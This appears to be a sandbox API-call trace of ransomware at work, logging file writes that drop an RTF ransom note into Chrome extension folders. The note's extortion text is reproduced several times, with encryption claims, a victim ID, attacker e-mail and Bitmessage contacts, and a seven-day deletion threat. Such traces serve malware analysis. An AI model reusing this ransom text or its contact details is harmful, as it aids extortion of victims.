butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.290] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.290] CloseHandle (hObject=0x2c8) returned 1 [0280.290] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0280.290] GetLastError () returned 0x2 [0280.290] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0280.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eeaaa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet 